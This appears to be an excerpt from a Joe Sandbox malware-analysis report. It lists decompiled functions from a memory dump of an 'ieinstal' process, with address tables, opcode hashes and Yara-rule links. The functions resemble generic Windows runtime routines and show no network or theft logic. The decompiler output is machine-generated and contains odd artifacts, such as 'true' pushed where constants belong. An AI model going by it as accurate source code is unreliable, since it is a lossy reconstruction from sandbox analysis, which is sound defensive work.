			E2273A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push("true");
				_push(0x227e0220);
				L2275D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x227f7b9c; // 0x0
				_t55 = L22724620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, "true");
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return L2275D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_push("true");
				_pop(_t57);
				memcpy(_t55 + 8, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L227277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x227f7b10 =  *0x227f7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x227f536c; // 0x6957db0
					if( *_t51 != 0x227f5368) {
						_push("true");
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x227f5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x227f536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = L2273A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x2273a61c
0x2273a61e
0x2273a623
0x2273a628
0x2273a62b
0x2273a62d
0x2273a648
0x2273a64a
0x2273a64f
0x22779b44
0x2273a6ec
0x2273a6f1
0x2273a6f1
0x2273a655
0x2273a657
0x2273a65a
0x2273a660
0x2273a662
0x2273a663
0x2273a667
0x2273a668
0x2273a66d
0x2273a706
0x2273a706
0x22779bda
0x22779be6
0x22779beb
0x00000000
0x22779beb
0x2273a679
0x22779b7a
0x00000000
0x22779b7a
0x2273a683
0x2273a6f4
0x2273a6f7
0x2273a6f9
0x2273a6fd
0x2273a6a0
0x2273a6a0
0x2273a6ad
0x2273a6af
0x2273a6b4
0x22779ba7
0x22779bac
0x00000000
0x00000000
0x22779bc6
0x22779bce
0x22779bd1
0x22779bd3
0x22779bd3
0x00000000
0x22779bd1
0x2273a6bd
0x2273a6c3
0x2273a6c6
0x2273a6d2
0x2273a701
0x2273a704
0x00000000
0x2273a704
0x2273a6d4
0x2273a6d6
0x2273a6d9
0x2273a6db
0x2273a6e1
0x2273a6e6
0x2273a6e8
0x2273a6e8
0x2273a6ea
0x00000000
0x2273a6ea
0x2273a688
0x2273a692
0x2273a694
0x2273a699
0x00000000
0x00000000
0x2273a69d
0x00000000

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a4f6ea6475458359137258b427392ee582f917501504dc18bce93b1fcc07b38
Instruction ID: 8e8448938fb0dadaf1ab153f0e0009e2fa140e01d7bd8cffed2ec34ef42ce2c2
Opcode Fuzzy Hash: 7a4f6ea6475458359137258b427392ee582f917501504dc18bce93b1fcc07b38
Instruction Fuzzy Hash: 51418AB5A09305DFCB16CF58C990B99BBF1FF59304F1581A9EA04AB355C778A901CF50

Uniqueness

Uniqueness Score: -1.00%

Function 2270AA16 Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E2270AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x227fd360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x227f7b9c; // 0x0
					_t53 = L22724620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E2274B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						L2274F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_push("true");
						_pop(_t51);
						if(L22716C59(_t53, _t51, _t58) != 0) {
							_t28 = E22735E50(0x226ec338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E2273B230(_v32, _v28, 0x226ec2d8, "true",  &_v24);
								_t28 = L2270F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L227277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x2270aa25
0x2270aa29
0x2270aa2d
0x2270aa30
0x2270aa37
0x2270aa3c
0x22764458
0x22764458
0x22764472
0x22764474
0x22764476
0x2270aa64
0x2270aa74
0x2276447c
0x22764483
0x22764492
0x2270aa52
0x2270aa52
0x2270aa54
0x2270aa5e
0x227644a8
0x227644ad
0x227644af
0x227644b6
0x227644b6
0x227644b9
0x227644bc
0x227644cd
0x227644d3
0x227644d6
0x227644e1
0x227644e1
0x227644e6
0x227644e8
0x227644fb
0x227644fb
0x227644e8
0x00000000
0x2270aa5e
0x22764476
0x2270aa42
0x2270aa46
0x2270aa48
0x2270aa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a069e8588d838ddb60da2d09585798cb84515734488fab399e32afe342b6145
Instruction ID: 30ecc41d102954076bb35db97c89e8faf53fd2830e3c1d082f8d8f9006a74008
Opcode Fuzzy Hash: 8a069e8588d838ddb60da2d09585798cb84515734488fab399e32afe342b6145
Instruction Fuzzy Hash: D131E571A04319ABCB129F65CE81ABFB7B9FF04700F010469F901E7144EB389E10CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 22744A2C Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E22744A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x227fd360 ^ _t62;
				_v8 =  *0x227fd360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E22722280(_t26, 0x227f8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						L2271FFB0(_t41, _t51, 0x227f8608);
						L2:
						 *0x227fb1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E2274B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E22722280(_t28, 0x227f8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							L2271FFB0(_t42, _t53, 0x227f8608);
							if(_t53 != 0) {
								L227277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						L2271FFB0(_t41, _t51, 0x227f8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x22744a2c
0x22744a34
0x22744a3c
0x22744a3e
0x22744a48
0x22744a4b
0x22744a4d
0x22744a51
0x22744a9c
0x00000000
0x00000000
0x22744aa3
0x22744aa8
0x22744aad
0x22744ab1
0x22744ade
0x22744ae3
0x22744a5a
0x22744a62
0x22744a6a
0x22744a6e
0x2277f203
0x22744a84
0x22744a88
0x22744a89
0x22744a8a
0x22744a95
0x22744a95
0x22744a79
0x22744a80
0x22744af2
0x22744af4
0x22744af9
0x22744aff
0x22744b01
0x22744b03
0x22744b08
0x2277f20a
0x2277f212
0x2277f216
0x2277f216
0x22744b08
0x22744b13
0x22744b1a
0x2277f229
0x2277f229
0x22744b1a
0x22744a82
0x00000000
0x22744a82
0x22744ab7
0x22744acd
0x22744acd
0x22744ad5
0x22744ada
0x00000000
0x22744ada
0x22744ac2
0x22744acb
0x00000000
0x00000000
0x00000000
0x22744acb
0x22744a53
0x22744a53
0x22744a58
0x00000000

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a95413ec90d0d132fdbed711d2a362273f483b73bc7611135683f1706c5a0c56
Instruction ID: c416c0be98868167da25fba65699f98d70a73427d6261ae0d2d1322d757c03ed
Opcode Fuzzy Hash: a95413ec90d0d132fdbed711d2a362273f483b73bc7611135683f1706c5a0c56
Instruction Fuzzy Hash: B0312432B0D710DBD7128F54CA88B1BBBB4FF91714F91062AE96947241CF70D900EB9A

Uniqueness

Uniqueness Score: -1.00%

Function 22748EC7 Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E22748EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x227fd360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E22734E70(0x227f86e4, 0x22749490, 0, 0);
					if( *0x227f53e8 > 5 && L22748F33(0x227f53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_push("true");
						_pop(_t70);
						_v60 =  &_v144;
						_push("true");
						_pop(_t67);
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x227f53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x227f53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x226ebc46;
						_t48 = L22787B9C(0x227f53e8, 0x226ebc46, _t67, 0x227f53e8, _t70,  &_v140);
					}
				}
				return E2274B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x22748ec7
0x22748ed9
0x22748edc
0x22748ee6
0x22748ee9
0x22748eee
0x22748efc
0x22748f08
0x22781349
0x22781353
0x2278135d
0x22781366
0x2278136f
0x22781375
0x2278137c
0x22781385
0x2278138e
0x22781390
0x22781391
0x2278139a
0x2278139c
0x2278139d
0x227813a6
0x227813ac
0x227813b2
0x227813b5
0x227813bc
0x227813bf
0x227813c2
0x227813c5
0x227813c8
0x227813cb
0x227813ce
0x227813d1
0x227813d4
0x227813d7
0x227813da
0x227813dd
0x227813e0
0x227813e3
0x227813e6
0x227813e9
0x227813f6
0x22781400
0x22781400
0x22748f08
0x22748f32

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88652682a756318875ee82b0661235ade561e91c9b956b86925b32c7b22119fd
Instruction ID: ddf83f46314639a22066436757a269dcfa616dc0d1bfaf35a03ef0f2e37e778e
Opcode Fuzzy Hash: 88652682a756318875ee82b0661235ade561e91c9b956b86925b32c7b22119fd
Instruction Fuzzy Hash: F8418FB1D04318DFDB24CFAAD980AAEFBF4BB48310F5041AEE509A7241EB755A84CF51

Uniqueness

Uniqueness Score: -1.00%

Function 22733B7A Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E22733B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x227f84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x227f84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L22724620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x227f84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push("true");
					_push( &_v12);
					_push(0x6b);
					_t44 = E2274AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E2274FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x227f84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x227f84c4; // 0x0
					L227277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x22733b89
0x22733b96
0x22733ba1
0x22733bab
0x22733bb5
0x22733bb9
0x22776298
0x22733bbf
0x22733bc2
0x22733bc3
0x22733bc9
0x22733bca
0x22733bcc
0x22733bcd
0x22733bd4
0x22733bd6
0x22733bdb
0x22733bea
0x22733bf7
0x22733bfb
0x22733bff
0x22733c09
0x22733c0a
0x22733c0b
0x22733c0f
0x22733c14
0x22733c18
0x22733c18
0x22733bfb
0x22733c1b
0x22733c30
0x22733c30
0x22733c3d

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e29121f63aff685ea6b24d12160d94ad7eacb4cde814fd131ea815556f9a1e5a
Instruction ID: 393b4ac6abeb5d3f55bc11815122563bbe0ac6acf97a542f0f13cfe89df85bed
Opcode Fuzzy Hash: e29121f63aff685ea6b24d12160d94ad7eacb4cde814fd131ea815556f9a1e5a
Instruction Fuzzy Hash: 4421F372A04208AFCB01CF58CD81F6AB7BDFB44708F250568EA08AB252D775ED41CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 227D2EF7 Relevance: .1, Instructions: 72
COMMONCrypto

Download Yara Rule

C-Code - Quality: 32%

			E227D2EF7(void* __ecx, signed int __edx, void* _a8, signed int _a12) {
				char _v5;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v32;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int _v60;
				signed int _v64;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t62;
				void* _t71;
				signed int _t94;
				signed int _t105;
				signed int _t106;
				void* _t107;
				signed int _t114;
				signed int _t115;
				signed int _t141;
				signed int _t142;
				signed char _t145;
				signed char _t146;
				void* _t154;
				signed int _t155;
				void* _t156;
				signed int _t160;
				signed int _t164;
				void* _t165;
				signed int _t172;
				signed int _t174;

				_push(__ecx);
				_push(__ecx);
				_t105 = __edx;
				_t154 = __ecx;
				_t160 =  *__edx ^ __edx;
				_t141 =  *(__edx + 4) ^ __edx;
				if(( *(_t160 + 4) ^ _t160) != __edx || ( *_t141 ^ _t141) != __edx) {
					_push("true");
					_pop(_t114);
					asm("int 0x29");
					_t174 = (_t172 & 0xfffffff8) - 0x24;
					_t62 =  *0x227fd360 ^ _t174;
					_v32 = _t62;
					_push(_t105);
					_push(_t160);
					_t106 = _t114;
					_t115 = _v20;
					_push(_t154);
					_t155 = _t141;
					_t142 = _v16;
					__eflags = _t115;
					if(__eflags != 0) {
						asm("bsf esi, ecx");
					} else {
						asm("bsf esi, edx");
						_t62 = (_t62 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff;
						__eflags = _t62;
						if(_t62 == 0) {
							_t160 = _v44;
						} else {
							_t160 = _t160 + 0x20;
						}
					}
					__eflags = _t142;
					if(__eflags == 0) {
						asm("bsr eax, ecx");
					} else {
						asm("bsr ecx, edx");
						if(__eflags == 0) {
							_t62 = _v44;
						} else {
							_t62 = _t115 + 0x20;
						}
					}
					_v56 = (_t160 << 0xc) + _t155;
					_v60 = _t62 - _t160 + 1 << 0xc;
					_t71 = L2274D0F0(1, _t62 - _t160 + 1, 0);
					asm("adc edx, 0xffffffff");
					_v52 = L2274D0F0(_t71 + 0xffffffff, _t160, 0);
					_v48 = 0;
					_v44 = _t155 + 0x10;
					E22722280(_t155 + 0x10, _t155 + 0x10);
					__eflags = _a12;
					_push(_v64);
					_push(_v60);
					_push( *((intOrPtr*)(_t106 + 0x20)));
					if(_a12 == 0) {
						 *0x227fb1e0();
						 *( *(_t106 + 0x30) ^  *0x227f6110 ^ _t106)();
						 *(_t155 + 0xc) =  *(_t155 + 0xc) &  !_v60;
						_t54 = _t155 + 8;
						 *_t54 =  *(_t155 + 8) &  !_v64;
						__eflags =  *_t54;
						goto L18;
					} else {
						 *0x227fb1e0();
						_t164 =  *( *(_t106 + 0x2c) ^  *0x227f6110 ^ _t106)();
						__eflags = _t164;
						if(_t164 >= 0) {
							 *(_t155 + 8) =  *(_t155 + 8) | _v64;
							 *(_t155 + 0xc) =  *(_t155 + 0xc) | _v60;
							L18:
							asm("lock xadd [eax], ecx");
							_t164 = 0;
							__eflags = 0;
						}
					}
					L2271FFB0(_t106, _t155, _v56);
					_pop(_t156);
					_pop(_t165);
					_pop(_t107);
					__eflags = _v48 ^ _t174;
					return E2274B640(_t164, _t107, _v48 ^ _t174, 0, _t156, _t165);
				} else {
					_t94 = _t141 ^ _t160;
					 *_t141 = _t94;
					 *(_t160 + 4) = _t94;
					_t145 =  !( *(__edx + 8));
					_t146 = _t145 >> 8;
					_v12 = _t146 >> 8;
					_v5 =  *((intOrPtr*)((_t145 & 0x000000ff) + 0x226eac00)) +  *((intOrPtr*)((_t146 & 0x000000ff) + 0x226eac00));
					asm("lock xadd [eax], edx");
					return __ecx + 0x18;
				}
			}

0x227d2efc
0x227d2efd
0x227d2eff
0x227d2f03
0x227d2f0a
0x227d2f0c
0x227d2f15
0x227d2fb8
0x227d2fba
0x227d2fbb
0x227d2fc5
0x227d2fcd
0x227d2fcf
0x227d2fd3
0x227d2fd4
0x227d2fd5
0x227d2fd7
0x227d2fda
0x227d2fdb
0x227d2fdd
0x227d2fe0
0x227d2fe2
0x227d2ffc
0x227d2fe4
0x227d2fe4
0x227d2fea
0x227d2fed
0x227d2fef
0x227d2ff6
0x227d2ff1
0x227d2ff1
0x227d2ff1
0x227d2fef
0x227d2fff
0x227d3001
0x227d301b
0x227d3003
0x227d3003
0x227d300e
0x227d3015
0x227d3010
0x227d3010
0x227d3010
0x227d300e
0x227d302c
0x227d3035
0x227d303c
0x227d3046
0x227d304e
0x227d3056
0x227d305a
0x227d305e
0x227d3063
0x227d3067
0x227d306b
0x227d306f
0x227d3072
0x227d30af
0x227d30b5
0x227d30c1
0x227d30c9
0x227d30c9
0x227d30c9
0x00000000
0x227d3074
0x227d3081
0x227d3089
0x227d308b
0x227d308d
0x227d3093
0x227d309a
0x227d30ce
0x227d30d1
0x227d30d5
0x227d30d5
0x227d30d5
0x227d308d
0x227d30db
0x227d30e6
0x227d30e7
0x227d30e8
0x227d30e9
0x227d30f3
0x227d2f27
0x227d2f29
0x227d2f2b
0x227d2f2d
0x227d2f36
0x227d2f3d
0x227d2f4c
0x227d2f58
0x227d2fad
0x227d2fb7
0x227d2fb7

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 399c36496f2fdfac66cc288ef1431882a7baf1b7026aaa82fd11ec23ca80e45b
Instruction ID: 13844bd571e555496049e358a2fefc75f7d6d1784283f0b8e2f98f7b50a947ce
Opcode Fuzzy Hash: 399c36496f2fdfac66cc288ef1431882a7baf1b7026aaa82fd11ec23ca80e45b
Instruction Fuzzy Hash: 5321B7F22042604FD305CB1AC8E09B6BFE6EFCA52235781F5E984CB743D5299917C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 2272AE73 Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E2272AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = L22727D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(L22727D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = L22727D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = L22727D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = L22787794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x2272ae78
0x2272ae7c
0x2272ae7e
0x2272ae81
0x2272ae86
0x2272ae8d
0x22772691
0x2272ae93
0x2272ae93
0x2272ae93
0x2272ae98
0x2272ae9d
0x227726a2
0x227726b4
0x227726a4
0x227726ad
0x227726ad
0x227726b9
0x00000000
0x227726bb
0x00000000
0x227726bb
0x2272aea3
0x2272aea3
0x2272aea3
0x2272aeaa
0x227726c0
0x227726c9
0x227726c9
0x2272aeb3
0x227726d4
0x227726e1
0x00000000
0x00000000
0x227726e7
0x227726ee
0x227726f0
0x227726f9
0x227726f9
0x22772702
0x22772708
0x22772708
0x2277270b
0x2277270f
0x22772711
0x22772711
0x22772725
0x22772725
0x00000000
0x2272aeb9
0x2272aeb9
0x2272aebf
0x2272aebf
0x2272aeb3

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

